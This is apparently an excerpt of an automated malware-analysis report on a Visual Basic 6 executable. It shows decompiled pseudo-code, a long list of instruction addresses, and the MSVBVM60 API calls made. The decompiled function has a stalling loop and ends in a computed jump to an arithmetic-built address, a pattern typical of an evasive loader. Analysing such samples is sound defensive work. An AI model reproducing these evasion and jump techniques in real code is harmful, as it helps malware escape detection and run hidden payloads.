					L0040130C();
					_t483 =  *0x430010; // 0x4df9f8
				}
				_t485 =  &_v216;
				L00401312();
				_t676 = _t485;
				_t487 =  *((intOrPtr*)( *_t676 + 0x58))(_t676,  &_v376, _t485,  *((intOrPtr*)( *_t483 + 0x32c))(_t483));
				asm("fclex");
				if(_t487 < 0) {
					_push(0x58);
					_push(0x42b0fc);
					_push(_t676);
					_push(_t487);
					L00401306();
				}
				_t677 = _a4;
				_t604 =  &_v372;
				_v380 = _v376;
				 *_t699 =  *0x401128;
				_v368 = _v360;
				_v372 = 0x6b40;
				_t491 =  *((intOrPtr*)( *_t677 + 0x6fc))(_t677,  &_v368, _t604, _t604, _t604, _v364,  &_v380,  &_v384);
				if(_t491 < 0) {
					_push(0x6fc);
					_push(0x42ac10);
					_push(_t677);
					_push(_t491);
					L00401306();
				}
				_push( &_v216);
				_push( &_v212);
				_push( &_v208);
				_t678 = 3;
				_push(_t678);
				L004012E8();
				_t636 = 1;
				_t495 = 0;
				while(_t495 <= 0x12e63) {
					_t495 = _t495 + _t636;
				}
				_t647 = 0xa;
				_v284 = 0x80020004;
				_v268 = 0x80020004;
				_v252 = 0x80020004;
				_push( &_v292);
				_push( &_v276);
				_push( &_v260);
				_push(0);
				_push( &_v244);
				_v292 = _t647;
				_v276 = _t647;
				_v260 = _t647;
				_v236 = 0xaf1aa;
				_a678 = 0x420530;
				_a678 = _a678 - 0xffffdda0;
				goto _a678;
			}

0x0042b836
0x0042b83d
0x0042b846
0x0042b849
0x0042b850
0x0042b858
0x0042b85b
0x0042b861
0x0042b864
0x0042b869
0x0042b86b
0x0042b873
0x0042b874
0x0042b877
0x0042b87a
0x0042b87d
0x0042b880
0x0042b883
0x0042b886
0x0042b889
0x0042b88c
0x0042b892
0x0042b898
0x0042b89e
0x0042b8a4
0x0042b8aa
0x0042b8b0
0x0042b8b6
0x0042b8bc
0x0042b8c2
0x0042b8c8
0x0042b8ce
0x0042b8d4
0x0042b8da
0x0042b8e0
0x0042b8e6
0x0042b8ec
0x0042b8f2
0x0042b8f8
0x0042b8fe
0x0042b904
0x0042b90a
0x0042b910
0x0042b916
0x0042b91c
0x0042b922
0x0042b928
0x0042b92e
0x0042b934
0x0042b93a
0x0042b940
0x0042b945
0x0042b947
0x0042b94c
0x0042b952
0x0042b953
0x0042b95d
0x0042b95e
0x0042b95f
0x0042b964
0x0042b96a
0x0042b972
0x0042b979
0x0042b97a
0x0042b984
0x0042b98f
0x0042b990
0x0042b996
0x0042b99c
0x0042b9a6
0x0042b9a7
0x0042b9b5
0x0042b9bc
0x0042b9bd
0x0042b9bf
0x0042b9c4
0x0042b9ca
0x0042b9cc
0x0042b9d7
0x0042b9d8
0x0042b9e2
0x0042b9ec
0x0042b9f7
0x0042b9fc
0x0042b9fe
0x0042ba03
0x0042ba03
0x0042ba08
0x0042ba0f
0x0042ba11
0x0042ba16
0x0042ba1b
0x0042ba20
0x0042ba20
0x0042ba2f
0x0042ba36
0x0042ba3b
0x0042ba40
0x0042ba46
0x0042ba4a
0x0042ba4c
0x0042ba51
0x0042ba56
0x0042ba57
0x0042ba58
0x0042ba58
0x0042ba63
0x0042ba68
0x0042ba6f
0x0042ba71
0x0042ba76
0x0042ba7b
0x0042ba80
0x0042ba80
0x0042ba8f
0x0042ba96
0x0042baa1
0x0042baa7
0x0042baad
0x0042bab1
0x0042bab3
0x0042bab8
0x0042babd
0x0042babe
0x0042babf
0x0042babf
0x0042bac4
0x0042bacb
0x0042bacd
0x0042bad2
0x0042bad7
0x0042badc
0x0042badc
0x0042baeb
0x0042baf2
0x0042bafd
0x0042bb03
0x0042bb09
0x0042bb0d
0x0042bb0f
0x0042bb14
0x0042bb19
0x0042bb1a
0x0042bb1b
0x0042bb1b
0x0042bb20
0x0042bb21
0x0042bb27
0x0042bb2d
0x0042bb2e
0x0042bb33
0x0042bb34
0x0042bb3a
0x0042bb40
0x0042bb41
0x0042bb46
0x0042bb47
0x0042bb4c
0x0042bb52
0x0042bb70
0x0042bb77
0x0042bb7e
0x0042bb85
0x0042bb86
0x0042bb88
0x0042bb93
0x0042bb9a
0x0042bb9b
0x0042bb9d
0x0042bba2
0x0042bba8
0x0042bbae
0x0042bbb5
0x0042bbb7
0x0042bbbc
0x0042bbc1
0x0042bbc6
0x0042bbc6
0x0042bbd5
0x0042bbdc
0x0042bbe7
0x0042bbed
0x0042bbf0
0x0042bbf4
0x0042bbf6
0x0042bbf8
0x0042bbfd
0x0042bbfe
0x0042bbff
0x0042bbff
0x0042bc04
0x0042bc0a
0x0042bc1e
0x0042bc0c
0x0042bc0c
0x0042bc11
0x0042bc16
0x0042bc17
0x0042bc17
0x0042bc23
0x0042bc33
0x0042bc36
0x0042bc3a
0x0042bc3c
0x0042bc3e
0x0042bc43
0x0042bc44
0x0042bc45
0x0042bc45
0x0042bc4a
0x0042bc5a
0x0042bc5d
0x0042bc63
0x0042bc67
0x0042bc69
0x0042bc6e
0x0042bc73
0x0042bc74
0x0042bc75
0x0042bc75
0x0042bc80
0x0042bc8b
0x0042bc92
0x0042bc93
0x0042bc95
0x0042bc9a
0x0042bc9f
0x0042bca4
0x0042bca6
0x0042bcab
0x0042bcb0
0x0042bcb5
0x0042bcb5
0x0042bcc4
0x0042bccb
0x0042bcd6
0x0042bcdc
0x0042bcdf
0x0042bce3
0x0042bce5
0x0042bce7
0x0042bcec
0x0042bced
0x0042bcee
0x0042bcee
0x0042bcf3
0x0042bcf9
0x0042bcfb
0x0042bd00
0x0042bd01
0x0042bd01
0x0042bd06
0x0042bd16
0x0042bd19
0x0042bd1d
0x0042bd1f
0x0042bd21
0x0042bd26
0x0042bd27
0x0042bd28
0x0042bd28
0x0042bd2d
0x0042bd3d
0x0042bd40
0x0042bd46
0x0042bd4a
0x0042bd4c
0x0042bd51
0x0042bd56
0x0042bd57
0x0042bd58
0x0042bd58
0x0042bd63
0x0042bd6e
0x0042bd75
0x0042bd76
0x0042bd78
0x0042bd7d
0x0042bd80
0x0042bd86
0x0042bd88
0x0042bd8d
0x0042bd8e
0x0042bd8e
0x0042bd93
0x0042bda4
0x0042bdab
0x0042bdb0
0x0042bdb4
0x0042bdba
0x0042bdc1
0x0042bdc8
0x0042bdcb
0x0042bdcf
0x0042bdd1
0x0042bdd3
0x0042bdd8
0x0042bdd9
0x0042bdda
0x0042bdda
0x0042bde5
0x0042bdf0
0x0042bdf5
0x0042bdf5
0x0042bdf8
0x0042bdfd
0x0042be03
0x0042be04
0x0042be09
0x0042be0a
0x0042be0f
0x0042be15
0x0042be34
0x0042be3c
0x0042be42
0x0042be48
0x0042be4a
0x0042be4f
0x0042be54
0x0042be54
0x0042be59
0x0042be69
0x0042be6c
0x0042be70
0x0042be72
0x0042be74
0x0042be79
0x0042be7a
0x0042be7b
0x0042be7b
0x0042be80
0x0042be90
0x0042be92
0x0042be95
0x0042be99
0x0042be9b
0x0042be9d
0x0042bea2
0x0042bea3
0x0042bea4
0x0042bea4
0x0042beb2
0x0042beb8
0x0042bec3
0x0042bec8
0x0042bec9
0x0042beca
0x0042becc
0x0042bed9
0x0042bede
0x0042bee5
0x0042bee7
0x0042beec
0x0042bef1
0x0042bef6
0x0042bef6
0x0042bf05
0x0042bf0c
0x0042bf17
0x0042bf1d
0x0042bf23
0x0042bf27
0x0042bf29
0x0042bf2e
0x0042bf33
0x0042bf34
0x0042bf35
0x0042bf35
0x0042bf3a
0x0042bf3b
0x0042bf47
0x0042bf48
0x0042bf4d
0x0042bf58
0x0042bf59
0x0042bf5a
0x0042bf5b
0x0042bf5c
0x0042bf62
0x0042bf63
0x0042bf6e
0x0042bf79
0x0042bf84
0x0042bf89
0x0042bf89
0x0042bf8c
0x0042bf93
0x0042bf95
0x0042bf9a
0x0042bf9f
0x0042bfa4
0x0042bfa4
0x0042bfb3
0x0042bfba
0x0042bfc5
0x0042bfcb
0x0042bfd1
0x0042bfd5
0x0042bfd7
0x0042bfdc
0x0042bfe1
0x0042bfe2
0x0042bfe3
0x0042bfe3
0x0042bff7
0x0042bffc
0x0042bfff
0x0042c006
0x0042c024
0x0042c02d
0x0042c037
0x0042c040
0x0042c04a
0x0042c054
0x0042c05c
0x0042c05e
0x0042c063
0x0042c068
0x0042c069
0x0042c06a
0x0042c06a
0x0042c075
0x0042c07c
0x0042c07d
0x0042c07f
0x0042c084
0x0042c08d
0x0042c092
0x0042c099
0x0042c09b
0x0042c0a0
0x0042c0a5
0x0042c0aa
0x0042c0aa
0x0042c0b9
0x0042c0c0
0x0042c0cb
0x0042c0d1
0x0042c0d7
0x0042c0db
0x0042c0dd
0x0042c0e2
0x0042c0e7
0x0042c0e8
0x0042c0e9
0x0042c0e9
0x0042c100
0x0042c109
0x0042c115
0x0042c11a
0x0042c121
0x0042c123
0x0042c128
0x0042c12d
0x0042c132
0x0042c132
0x0042c141
0x0042c148
0x0042c153
0x0042c159
0x0042c15f
0x0042c163
0x0042c165
0x0042c16a
0x0042c16f
0x0042c170
0x0042c171
0x0042c171
0x0042c176
0x0042c181
0x0042c1a7
0x0042c1b3
0x0042c1b8
0x0042c1bf
0x0042c1c1
0x0042c1c6
0x0042c1cb
0x0042c1d0
0x0042c1d0
0x0042c1df
0x0042c1e6
0x0042c1f1
0x0042c1f7
0x0042c1fa
0x0042c1fe
0x0042c200
0x0042c202
0x0042c207
0x0042c208
0x0042c209
0x0042c209
0x0042c20e
0x0042c215
0x0042c217
0x0042c21c
0x0042c221
0x0042c226
0x0042c226
0x0042c235
0x0042c23c
0x0042c247
0x0042c24d
0x0042c250
0x0042c254
0x0042c256
0x0042c258
0x0042c25d
0x0042c25e
0x0042c25f
0x0042c25f
0x0042c264
0x0042c26f
0x0042c290
0x0042c29c
0x0042c2a3
0x0042c2a4
0x0042c2a6
0x0042c2ab
0x0042c2b0
0x0042c2b5
0x0042c2b7
0x0042c2bc
0x0042c2c1
0x0042c2c6
0x0042c2c6
0x0042c2d5
0x0042c2dc
0x0042c2e7
0x0042c2ed
0x0042c2f3
0x0042c2f7
0x0042c2f9
0x0042c2fe
0x0042c303
0x0042c304
0x0042c305
0x0042c305
0x0042c30a
0x0042c30b
0x0042c30c
0x0042c318
0x0042c319
0x0042c31e
0x0042c323
0x0042c328
0x0042c341
0x0042c32a
0x0042c32a
0x0042c32f
0x0042c334
0x0042c335
0x0042c33a
0x0042c33a
0x0042c350
0x0042c357
0x0042c362
0x0042c368
0x0042c36b
0x0042c36f
0x0042c371
0x0042c373
0x0042c378
0x0042c379
0x0042c37a
0x0042c37a
0x0042c37f
0x0042c386
0x0042c388
0x0042c38d
0x0042c38e
0x0042c393
0x0042c393
0x0042c3a2
0x0042c3a9
0x0042c3b4
0x0042c3ba
0x0042c3c0
0x0042c3c4
0x0042c3c6
0x0042c3cb
0x0042c3d0
0x0042c3d1
0x0042c3d2
0x0042c3d2
0x0042c3d7
0x0042c3de
0x0042c3e0
0x0042c3e5
0x0042c3e6
0x0042c3eb
0x0042c3eb
0x0042c3fa
0x0042c401
0x0042c40c
0x0042c412
0x0042c415
0x0042c419
0x0042c41b
0x0042c41d
0x0042c422
0x0042c423
0x0042c424
0x0042c424
0x0042c429
0x0042c430
0x0042c432
0x0042c437
0x0042c438
0x0042c43d
0x0042c43d
0x0042c44c
0x0042c453
0x0042c45e
0x0042c464
0x0042c46a
0x0042c46e
0x0042c470
0x0042c475
0x0042c47a
0x0042c47b
0x0042c47c
0x0042c47c
0x0042c48d
0x0042c493
0x0042c49e
0x0042c4b0
0x0042c4bd
0x0042c4c1
0x0042c4ce
0x0042c4d5
0x0042c4dd
0x0042c4df
0x0042c4e4
0x0042c4e9
0x0042c4ea
0x0042c4eb
0x0042c4eb
0x0042c4f6
0x0042c4fd
0x0042c504
0x0042c50b
0x0042c50c
0x0042c50e
0x0042c519
0x0042c520
0x0042c527
0x0042c52e
0x0042c535
0x0042c53c
0x0042c53d
0x0042c53f
0x0042c544
0x0042c54d
0x0042c552
0x0042c559
0x0042c55b
0x0042c560
0x0042c565
0x0042c56a
0x0042c56a
0x0042c579
0x0042c580
0x0042c58b
0x0042c591
0x0042c597
0x0042c59b
0x0042c59d
0x0042c5a2
0x0042c5a7
0x0042c5a8
0x0042c5a9
0x0042c5a9
0x0042c5ca
0x0042c5d3
0x0042c5de
0x0042c5e8
0x0042c5f2
0x0042c5fc
0x0042c609
0x0042c60b
0x0042c60c
0x0042c611
0x0042c614
0x0042c615
0x0042c615
0x0042c620
0x0042c625
0x0042c62c
0x0042c62e
0x0042c633
0x0042c638
0x0042c63d
0x0042c63d
0x0042c64c
0x0042c653
0x0042c65e
0x0042c664
0x0042c66a
0x0042c66e
0x0042c670
0x0042c675
0x0042c67a
0x0042c67b
0x0042c67c
0x0042c67c
0x0042c681
0x0042c688
0x0042c68a
0x0042c68f
0x0042c694
0x0042c699
0x0042c699
0x0042c6a8
0x0042c6af
0x0042c6ba
0x0042c6c0
0x0042c6c6
0x0042c6ca
0x0042c6cc
0x0042c6d1
0x0042c6d6
0x0042c6d7
0x0042c6d8
0x0042c6d8
0x0042c6e9
0x0042c700
0x0042c709
0x0042c713
0x0042c71c
0x0042c726
0x0042c730
0x0042c738
0x0042c73a
0x0042c73b
0x0042c740
0x0042c741
0x0042c742
0x0042c742
0x0042c757
0x0042c764
0x0042c76a
0x0042c78b
0x0042c791
0x0042c798
0x0042c79a
0x0042c79f
0x0042c7a4
0x0042c7a9
0x0042c7a9
0x0042c7b8
0x0042c7bf
0x0042c7ca
0x0042c7d0
0x0042c7d6
0x0042c7da
0x0042c7dc
0x0042c7e1
0x0042c7e6
0x0042c7e7
0x0042c7e8
0x0042c7e8
0x0042c7ed
0x0042c7f4
0x0042c7f6
0x0042c7fb
0x0042c800
0x0042c805
0x0042c805
0x0042c814
0x0042c81b
0x0042c826
0x0042c82c
0x0042c832
0x0042c836
0x0042c838
0x0042c83d
0x0042c842
0x0042c843
0x0042c844
0x0042c844
0x0042c849
0x0042c850
0x0042c852
0x0042c857
0x0042c85c
0x0042c861
0x0042c861
0x0042c870
0x0042c877
0x0042c882
0x0042c888
0x0042c88b
0x0042c88f
0x0042c891
0x0042c893
0x0042c898
0x0042c899
0x0042c89a
0x0042c89a
0x0042c8ab
0x0042c8c2
0x0042c8cb
0x0042c8d1
0x0042c8e1
0x0042c8ea
0x0042c8f4
0x0042c8fc
0x0042c8fe
0x0042c8ff
0x0042c904
0x0042c905
0x0042c906
0x0042c906
0x0042c911
0x0042c918
0x0042c91f
0x0042c922
0x0042c923
0x0042c924
0x0042c933
0x0042c934
0x0042c936
0x0042c93a
0x0042c93a
0x0042c940
0x0042c946
0x0042c94c
0x0042c952
0x0042c95e
0x0042c965
0x0042c96c
0x0042c96d
0x0042c974
0x0042c975
0x0042c97b
0x0042c981
0x0042c987
0x0042c991
0x0042c99b
0x0042c9a5

APIs

__vbaAryConstruct2.MSVBVM60(?,0042B270,00000003), ref: 0042B940
__vbaAryConstruct2.MSVBVM60(?,0042B28C,00000011,?,0042B270,00000003), ref: 0042B953
__vbaStrCat.MSVBVM60(0042B0C8,0042B0C8,?,0042B28C,00000011,?,0042B270,00000003), ref: 0042B95F
#617.MSVBVM60(?,?,00000001,0042B0C8,0042B0C8,?,0042B28C,00000011,?,0042B270,00000003), ref: 0042B984
__vbaVarTstNe.MSVBVM60(?,?,?,?,00000001,0042B0C8,0042B0C8,?,0042B28C,00000011,?,0042B270,00000003), ref: 0042B9A7
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,00000001,0042B0C8,0042B0C8,?,0042B28C,00000011,?,0042B270,00000003), ref: 0042B9BF
#598.MSVBVM60 ref: 0042B9CC
#648.MSVBVM60(00000008), ref: 0042B9EC
__vbaFreeVar.MSVBVM60(00000008), ref: 0042B9F7
#580.MSVBVM60(Smaaartikler4,00000001,00000008), ref: 0042BA03
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042BA1B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042BA36
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0EC,00000128), ref: 0042BA58
__vbaFreeObj.MSVBVM60(00000000,00000000,0042B0EC,00000128), ref: 0042BA63
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042BA7B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042BA96
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,000000E8), ref: 0042BABF
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042BAD7
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042BAF2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,00000108), ref: 0042BB1B
__vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0042BB2E
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,00000000), ref: 0042BB41
__vbaSetSystemError.MSVBVM60(00000000,?,?,00000000,?,?,00000000), ref: 0042BB52
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BB88
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000004,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BB9D
__vbaNew2.MSVBVM60(0042A01C,00430010,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BBC1
__vbaObjSet.MSVBVM60(?,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BBDC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B11C,00000048,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BBFF
__vbaNew2.MSVBVM60(0042AF8C,00430340,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BC17
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BC45
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000138,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BC75
__vbaFreeStr.MSVBVM60(?,00000000,?,?,00000000,?,?,00000000), ref: 0042BC80
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BC95
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BCB0
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BCCB
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,00000048,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BCEE
__vbaNew2.MSVBVM60(0042AF8C,00430340,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BD01
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BD28
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000138,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BD58
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BD63
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BD78
__vbaNew2.MSVBVM60(0042AF8C,00430340,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BD8E
__vbaLateMemCallLd.MSVBVM60(00000008,?,jHCw1jHImJpY116,00000000,?,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 0042BDAB
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0042BDB4
__vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042BDC1
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,0000000C,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042BDDA
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 0042BDE5
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 0042BDF0
__vbaStrToAnsi.MSVBVM60(?,Mariamman,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BE04
__vbaSetSystemError.MSVBVM60(00000000,?,Mariamman,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BE15
__vbaFreeStr.MSVBVM60(00000000,?,Mariamman,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BE34
__vbaNew2.MSVBVM60(0042AF8C,00430340,00000000,?,Mariamman,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BE54
__vbaHresultCheckObj.MSVBVM60(00000000,0218E8B4,0042B13C,00000014,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BE7B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0042AC4C,00000060,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BEA4
__vbaStrMove.MSVBVM60(?,00000000,?,?,00000000,?,?,00000000), ref: 0042BEB8
__vbaFreeObj.MSVBVM60(?,00000000,?,?,00000000,?,?,00000000), ref: 0042BEC3
#706.MSVBVM60(00000001,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BECC
__vbaStrMove.MSVBVM60(00000001,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BED9
__vbaNew2.MSVBVM60(0042A01C,00430010,00000001,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BEF1
__vbaObjSet.MSVBVM60(?,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF0C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,00000198,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF35
#716.MSVBVM60(00000008,?,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF48
__vbaLateIdSt.MSVBVM60(?,00000000,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF63
__vbaFreeStr.MSVBVM60(?,00000000,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF6E
__vbaFreeObj.MSVBVM60(?,00000000,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF79
__vbaFreeVar.MSVBVM60(?,00000000,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF84
__vbaNew2.MSVBVM60(0042A01C,00430010,00000000,?,Mariamman,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BF9F
__vbaObjSet.MSVBVM60(?,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BFBA
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,00000178,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BFE3
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000), ref: 0042BFF7
__vbaI4Var.MSVBVM60(00000008,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042C006
__vbaHresultCheckObj.MSVBVM60(00000000,00401158,0042AC10,000006FC,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042C06A
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042C07F
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042C08D
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C0A5
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C0C0
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,000000A0,?,?,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0042C0E9
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042C115
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C12D
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C148
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,000001A0,?,?,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0042C171
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0042C1B3
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C1CB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C1E6
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,00000078,?,?,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0042C209
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C221
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,?), ref: 0042C23C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,00000060,?,?,?,?,?,?,?,?,00000000,?,?,00000000), ref: 0042C25F
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 0042C2A6
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0042C2C1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0042C2DC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B11C,00000178,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042C305
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042C319
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042C335
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C357
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0EC,00000068), ref: 0042C37A
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042C38E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C3A9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,000000F0), ref: 0042C3D2
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042C3E6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C401
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B10C,00000050), ref: 0042C424
__vbaNew2.MSVBVM60(0042A01C,00430010), ref: 0042C438
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042C453
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B0FC,000000A0), ref: 0042C47C
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042C493
__vbaStrVarMove.MSVBVM60(00000008,?,?,?,?), ref: 0042C4C1
__vbaStrMove.MSVBVM60(00000008,?,?,?,?), ref: 0042C4CE
__vbaHresultCheckObj.MSVBVM60(00000000,00401158,0042AC10,000006F8,?,?,?,?), ref: 0042C4EB
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 0042C50E
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?,00000004,?,?,?,?,?,?,?,?), ref: 0042C53F
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C54D
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C565
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C580
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B11C,000000E0,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C5A9
__vbaHresultCheckObj.MSVBVM60(00000000,00401158,0042AC10,000006FC,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C615
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C620
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C638
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C653
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B19C,00000098,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C67C
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C694
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C6AF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0042B19C,000000B8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C6D8
__vbaHresultCheckObj.MSVBVM60(00000000,00401158,0042AC10,000006FC,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C742
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C757
__vbaNew2.MSVBVM60(0042A01C,00430010,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C7A4
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042C7BF
